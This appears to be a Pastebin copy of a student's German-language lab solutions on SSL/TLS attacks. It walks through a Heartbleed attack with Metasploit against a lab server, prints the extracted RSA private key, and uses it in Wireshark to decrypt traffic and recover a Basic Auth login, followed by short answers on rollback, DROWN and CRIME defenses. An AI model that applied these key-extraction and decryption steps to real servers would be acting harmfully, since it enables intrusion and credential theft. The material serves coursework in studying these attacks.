API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 4th, 2018
603
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.63 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. 2.)
  4. a.)
  5. (a) Führen Sie einen Heartbleedangriff mittels Metasploit auf den verwundbaren Server durch und beschaffen Sie sich den geheimen RSA-Schlüssel.
  6.  
  7. In Metasploit:
  8. use auxiliary/scanner/ssl/openssl_heartbleed
  9. set RHOSTS 192.168.1.10
  10. set ACTION KEYS
  11. run
  12.  
  13. In der neu erstellten Datei befindet sich der Key:
  14.  
  15. -----BEGIN RSA PRIVATE KEY-----
  16. MIIEpQIBAAKCAQEAyUSgpv7pEzDTihKH2zBwrjVvPvF15ItyncUEVMX3L3OgODxH
  17. IdjRS6EFgLmcnkoxioP0xblFCnehfp3uOK/N6O0L7frZJAcEWbYi6n/Q457ga9Qm
  18. eHK18YSMgIZM63R2ORRsaIsPA0isTJJ06l8Oy/TcblUSW0Ka8Wv1XXSb38+GrwwS
  19. jsSG3KhcBGjNE38JBxrxTEPPWI/iR3YxrcOk4/b+wK4+vdgQiEh7lKmk7qJ429t1
  20. 0Tl879TKEiszzdTOJUM+LCTnriQQCUOo4B1gnT03IzO6HnJED/y4h8SxT87ydbP1
  21. q/em+X1i8iWjPyscm7kCln+l37aqGwo6AgLD1QIDAQABAoIBAQCrF4K10xYQ8T2y
  22. LsR8aLYw8U2LJTnBuWUKhvOCmPLizJjTlTImrKhmcRA7eA2SZaGtjTTja/Yryrxm
  23. 5Rwf5hrVOcUdXVN/E9P36yPNUjAhfupp32OAmoreL348t23l7g+dwCXTzPpLIVkO
  24. kqV+oqXybUmBJSJAn+MU/WAMPNdQrhh0U5YGPypM0NYFmXRSf0gpdyyXb2RL+jiA
  25. A2UwKaUdcFgl2jzUDaB+3VWk/JAaG2IdYBG6Ki0/v3QBJ3VbRrBM4up5Ky03G/77
  26. 6MxocWJt8pjG3Q7EammyIoXJ7eFkNZcgPmIvLECVxf8L1lSiMbmzvChvvFW5hRL1
  27. FVuWWtu1AoGBAOPrZ2cvxoEK+CLsQ1/t4wlSy0m6145OiqSgt5m/pJhp4IGT6Ey2
  28. SPgBxpnL/l35ZG7QD9dA64TvQWB5DJKq5vO6sTJWpemI1TRon35eqMS+TgdenE5F
  29. 6+Sx62nZPCZ2UEsKrLLrpUqnBjbMIiG+4fla9kF8INPnPWkYjdzr4IQzAoGBAOIQ
  30. onnWELofltXqVJdc2p9+DgRshPRFX6EzDsOWB1BExwlHpy2FgVEpszVfZLReriVb
  31. KpwV+R4Xe+Z5EiycA/i39ypQK2tMJSzJj+CEp5jfjyPjKxespSHEXRmYux6hBBO2
  32. ayS10wx44y6fFuGkk5RZ4g9rI+iJu0w4nEv5uE/XAoGBAIYjprDhOlf6R73uBV0x
  33. Gb0EAGb9Ux4K9agcetI/KzUUozBAB6kWY22rReKAX82ZGNXrGFecesC7O2P2+kJb
  34. 2R87EkzJGE6Q3MJCjRQHzBY21p+ZvC6JEmN/n0iltLQCUBFKUAfhjl+YW5zmmXP4
  35. 7vAd6+7wijWM0+TFscCDBplnAoGBAJSeVQJ+Hd8O123osRYVYFEMYRC9eybP2M+0
  36. Llec8U/u9179cUW3CE4geQV0olMGD7zVU4zr0SvcSoM5Qx56rw27e82giPrwQ1xP
  37. Yrw62afiCUuRlAnrYWBypLYoN5QqTPDcs1GeC5KegtRqmHNda/xSnxB94kyFB9JT
  38. QUWddXNfAoGACfFSvdjoERUaor0AYAVEsrVqRSu5dHEFTGOc00DIzoHYqwpWTvup
  39. PAR2xp8jsTtMXg9krVG4cqzbp/ZFECvmymFKP3WeRp8OXVEyg5WptVEVzjjDaouZ
  40. EfutQILVD0yPWS9ghN0j9UuUBdaGu18KGfjsfkIfVhuxSGxh4PacEPU=
  41. -----END RSA PRIVATE KEY-----
  42.  
  43. openssl rsa -in rsa.txt -pubout > key.pub
  44.  
  45. -----BEGIN PUBLIC KEY-----
  46. MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyUSgpv7pEzDTihKH2zBw
  47. rjVvPvF15ItyncUEVMX3L3OgODxHIdjRS6EFgLmcnkoxioP0xblFCnehfp3uOK/N
  48. 6O0L7frZJAcEWbYi6n/Q457ga9QmeHK18YSMgIZM63R2ORRsaIsPA0isTJJ06l8O
  49. y/TcblUSW0Ka8Wv1XXSb38+GrwwSjsSG3KhcBGjNE38JBxrxTEPPWI/iR3YxrcOk
  50. 4/b+wK4+vdgQiEh7lKmk7qJ429t10Tl879TKEiszzdTOJUM+LCTnriQQCUOo4B1g
  51. nT03IzO6HnJED/y4h8SxT87ydbP1q/em+X1i8iWjPyscm7kCln+l37aqGwo6AgLD
  52. 1QIDAQAB
  53. -----END PUBLIC KEY-----
  54.  
  55. (b) Zerlegen Sie den RSA-Schlüssel mittels openssl in seine Bestandteile und bestimmen Sie den Entschlüsselungsexponenten.
  56.  
  57. In der Konsole:
  58. openssl rsa -text -in rsa.txt -out key.pub
  59.  
  60. In key.pub:
  61. Private-Key: (2048 bit)
  62. modulus:
  63. 00:c9:44:a0:a6:fe:e9:13:30:d3:8a:12:87:db:30:
  64. 70:ae:35:6f:3e:f1:75:e4:8b:72:9d:c5:04:54:c5:
  65. f7:2f:73:a0:38:3c:47:21:d8:d1:4b:a1:05:80:b9:
  66. 9c:9e:4a:31:8a:83:f4:c5:b9:45:0a:77:a1:7e:9d:
  67. ee:38:af:cd:e8:ed:0b:ed:fa:d9:24:07:04:59:b6:
  68. 22:ea:7f:d0:e3:9e:e0:6b:d4:26:78:72:b5:f1:84:
  69. 8c:80:86:4c:eb:74:76:39:14:6c:68:8b:0f:03:48:
  70. ac:4c:92:74:ea:5f:0e:cb:f4:dc:6e:55:12:5b:42:
  71. 9a:f1:6b:f5:5d:74:9b:df:cf:86:af:0c:12:8e:c4:
  72. 86:dc:a8:5c:04:68:cd:13:7f:09:07:1a:f1:4c:43:
  73. cf:58:8f:e2:47:76:31:ad:c3:a4:e3:f6:fe:c0:ae:
  74. 3e:bd:d8:10:88:48:7b:94:a9:a4:ee:a2:78:db:db:
  75. 75:d1:39:7c:ef:d4:ca:12:2b:33:cd:d4:ce:25:43:
  76. 3e:2c:24:e7:ae:24:10:09:43:a8:e0:1d:60:9d:3d:
  77. 37:23:33:ba:1e:72:44:0f:fc:b8:87:c4:b1:4f:ce:
  78. f2:75:b3:f5:ab:f7:a6:f9:7d:62:f2:25:a3:3f:2b:
  79. 1c:9b:b9:02:96:7f:a5:df:b6:aa:1b:0a:3a:02:02:
  80. c3:d5
  81. publicExponent: 65537 (0x10001)
  82. privateExponent:
  83. 00:ab:17:82:b5:d3:16:10:f1:3d:b2:2e:c4:7c:68:
  84. b6:30:f1:4d:8b:25:39:c1:b9:65:0a:86:f3:82:98:
  85. f2:e2:cc:98:d3:95:32:26:ac:a8:66:71:10:3b:78:
  86. 0d:92:65:a1:ad:8d:34:e3:6b:f6:2b:ca:bc:66:e5:
  87. 1c:1f:e6:1a:d5:39:c5:1d:5d:53:7f:13:d3:f7:eb:
  88. 23:cd:52:30:21:7e:ea:69:df:63:80:9a:8a:de:2f:
  89. 7e:3c:b7:6d:e5:ee:0f:9d:c0:25:d3:cc:fa:4b:21:
  90. 59:0e:92:a5:7e:a2:a5:f2:6d:49:81:25:22:40:9f:
  91. e3:14:fd:60:0c:3c:d7:50:ae:18:74:53:96:06:3f:
  92. 2a:4c:d0:d6:05:99:74:52:7f:48:29:77:2c:97:6f:
  93. 64:4b:fa:38:80:03:65:30:29:a5:1d:70:58:25:da:
  94. 3c:d4:0d:a0:7e:dd:55:a4:fc:90:1a:1b:62:1d:60:
  95. 11:ba:2a:2d:3f:bf:74:01:27:75:5b:46:b0:4c:e2:
  96. ea:79:2b:2d:37:1b:fe:fb:e8:cc:68:71:62:6d:f2:
  97. 98:c6:dd:0e:c4:6a:69:b2:22:85:c9:ed:e1:64:35:
  98. 97:20:3e:62:2f:2c:40:95:c5:ff:0b:d6:54:a2:31:
  99. b9:b3:bc:28:6f:bc:55:b9:85:12:f5:15:5b:96:5a:
  100. db:b5
  101. prime1:
  102. 00:e3:eb:67:67:2f:c6:81:0a:f8:22:ec:43:5f:ed:
  103. e3:09:52:cb:49:ba:d7:8e:4e:8a:a4:a0:b7:99:bf:
  104. a4:98:69:e0:81:93:e8:4c:b6:48:f8:01:c6:99:cb:
  105. fe:5d:f9:64:6e:d0:0f:d7:40:eb:84:ef:41:60:79:
  106. 0c:92:aa:e6:f3:ba:b1:32:56:a5:e9:88:d5:34:68:
  107. 9f:7e:5e:a8:c4:be:4e:07:5e:9c:4e:45:eb:e4:b1:
  108. eb:69:d9:3c:26:76:50:4b:0a:ac:b2:eb:a5:4a:a7:
  109. 06:36:cc:22:21:be:e1:f9:5a:f6:41:7c:20:d3:e7:
  110. 3d:69:18:8d:dc:eb:e0:84:33
  111. prime2:
  112. 00:e2:10:a2:79:d6:10:ba:1f:96:d5:ea:54:97:5c:
  113. da:9f:7e:0e:04:6c:84:f4:45:5f:a1:33:0e:c3:96:
  114. 07:50:44:c7:09:47:a7:2d:85:81:51:29:b3:35:5f:
  115. 64:b4:5e:ae:25:5b:2a:9c:15:f9:1e:17:7b:e6:79:
  116. 12:2c:9c:03:f8:b7:f7:2a:50:2b:6b:4c:25:2c:c9:
  117. 8f:e0:84:a7:98:df:8f:23:e3:2b:17:ac:a5:21:c4:
  118. 5d:19:98:bb:1e:a1:04:13:b6:6b:24:b5:d3:0c:78:
  119. e3:2e:9f:16:e1:a4:93:94:59:e2:0f:6b:23:e8:89:
  120. bb:4c:38:9c:4b:f9:b8:4f:d7
  121. exponent1:
  122. 00:86:23:a6:b0:e1:3a:57:fa:47:bd:ee:05:5d:31:
  123. 19:bd:04:00:66:fd:53:1e:0a:f5:a8:1c:7a:d2:3f:
  124. 2b:35:14:a3:30:40:07:a9:16:63:6d:ab:45:e2:80:
  125. 5f:cd:99:18:d5:eb:18:57:9c:7a:c0:bb:3b:63:f6:
  126. fa:42:5b:d9:1f:3b:12:4c:c9:18:4e:90:dc:c2:42:
  127. 8d:14:07:cc:16:36:d6:9f:99:bc:2e:89:12:63:7f:
  128. 9f:48:a5:b4:b4:02:50:11:4a:50:07:e1:8e:5f:98:
  129. 5b:9c:e6:99:73:f8:ee:f0:1d:eb:ee:f0:8a:35:8c:
  130. d3:e4:c5:b1:c0:83:06:99:67
  131. exponent2:
  132. 00:94:9e:55:02:7e:1d:df:0e:d7:6d:e8:b1:16:15:
  133. 60:51:0c:61:10:bd:7b:26:cf:d8:cf:b4:2e:57:9c:
  134. f1:4f:ee:f7:5e:fd:71:45:b7:08:4e:20:79:05:74:
  135. a2:53:06:0f:bc:d5:53:8c:eb:d1:2b:dc:4a:83:39:
  136. 43:1e:7a:af:0d:bb:7b:cd:a0:88:fa:f0:43:5c:4f:
  137. 62:bc:3a:d9:a7:e2:09:4b:91:94:09:eb:61:60:72:
  138. a4:b6:28:37:94:2a:4c:f0:dc:b3:51:9e:0b:92:9e:
  139. 82:d4:6a:98:73:5d:6b:fc:52:9f:10:7d:e2:4c:85:
  140. 07:d2:53:41:45:9d:75:73:5f
  141. coefficient:
  142. 09:f1:52:bd:d8:e8:11:15:1a:a2:bd:00:60:05:44:
  143. b2:b5:6a:45:2b:b9:74:71:05:4c:63:9c:d3:40:c8:
  144. ce:81:d8:ab:0a:56:4e:fb:a9:3c:04:76:c6:9f:23:
  145. b1:3b:4c:5e:0f:64:ad:51:b8:72:ac:db:a7:f6:45:
  146. 10:2b:e6:ca:61:4a:3f:75:9e:46:9f:0e:5d:51:32:
  147. 83:95:a9:b5:51:15:ce:38:c3:6a:8b:99:11:fb:ad:
  148. 40:82:d5:0f:4c:8f:59:2f:60:84:dd:23:f5:4b:94:
  149. 05:d6:86:bb:5f:0a:19:f8:ec:7e:42:1f:56:1b:b1:
  150. 48:6c:61:e0:f6:9c:10:f5
  151.  
  152. (c) Im Labornetzwerk verbindet sich ein Client via SSL in regelmäßigen Abständen mit diesem Server und es findet ein Datenaustausch statt. Versuchen Sie an den Inhalt dieser Daten zu gelangen.
  153. Den RSA Key in Wireshark einbinden:
  154. Bearbeiten -> Einstellungen -> Protocols -> SSL -> RSA keys list -> Edit
  155. IP address: 192.168.1.10, Port: 443, Protocol: tcp, Key File: rsa.txt, Password: <empty>
  156. SSL debug file -> ssldebug.txt neu erstellt
  157.  
  158. Eine entschlüsselte Nachricht:
  159. GET /private/output.txt HTTP/1.1
  160. Authorization: Basic aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
  161. User-Agent: curl/7.38.0
  162. Host: 192.168.1.10
  163. Accept: */*
  164.  
  165. Base64 zu PlainText:
  166. aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
  167. itsuser:xOuWMVkqaIlTHSRfvrop
  168.  
  169. Damit auf der Seite einloggen: https://192.168.1.10/private/output.txt
  170. Inhalt der Seite: 3873dbad19d9b5edd -
  171.  
  172. b.) Wie ändert sich die Situation, wenn TLS mit DHE-RSA-Schlüsselaustausch anstelle von SSL mit RSA-Schlüsselaustausch bei gleichbleibenden RSA-Schlüssel verwendet wird.
  173. The idea is that even if someone records traffic and compromises the server to get its private key, they won't be able to decipher that traffic, because they'll be missing the ephemeral DH parameters that won't have been saved. With fixed DH, the private DH parameters are effectively the private key: they would also be compromised in the same way and allow the attacker to decipher past traffic too.
  174.  
  175. 3.)
  176. a.) Beschreiben Sie, wie man „Cipher Suite Rollback“ und „ChangeCipherSpec drop“verhindert.
  177. "The problem was fixed with the release of SSL 3.0 by authenticating all messages of the Handshake Protocol."
  178. "A hash value of all handshake messages sent and received by the client was included into the computations of the Client Finished message."
  179. "There are several countermeasures for defending against the Cipher Suite Rollback Attack:
  180. - Message Authentication to prevent the messages from being modified (Fernandez,E.B. 2013).
  181. - Sender Authentication that insures the non-repudiation of the messages. (Fernandez, E.B. 2013; Schumacher et al. 2006)
  182. - Message integrity that prevents the messages from any modification (Fernandez, E.B. 2013).
  183. - Confidentiality of traffic flow that prevents traffic analysis (Fernandez,E.B. 2013)."
  184.  
  185. "The author’s recommendation is to force both parties to ensure that a ChangeCipherSpec message is received before accepting the Finished message. According to RFC 2246 TLS 1.0 enforces this recommendation."
  186.  
  187. b.) Beschreiben Sie kurz und knapp die Grundidee von „Drown“ und wie man diesen Angriff verhindern kann.
  188. "The exploit includes a chosen-ciphertext attack with the use of a SSLv2 server as a Bleichenbacher oracle."
  189. "To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with server software that allows SSLv2 connections."
  190.  
  191. c.) Beschreiben Sie kurz und knapp die Grundidee von „Crime“ und wie man diesen Angriff verhindern kann. Gehen Sie insbesondere darauf ein, worauf es der Angreifer bei diesem Angriff abgesehen hat.
  192. "CRIME decrypts HTTPS cookies set by websites to remember authenticated users by means of brute force. The attack code forces the victim's browser to send specially crafted HTTPS requests to a targeted website and analyzes the variation in their length after they've been compressed in order to determine the value of the victim's session cookie."
  193. "This is possible because SSL/TLS and SPDY use a compression algorithm called DEFLATE, which eliminates duplicate strings."
  194. "CRIME can be defeated by preventing the use of compression, either at the client end, by the browser disabling the compression of SPDY requests, or by the website preventing the use of data compression on such transactions using the protocol negotiation features of the TLS protocol."
  195. "When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, allowing the launching of further attacks."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!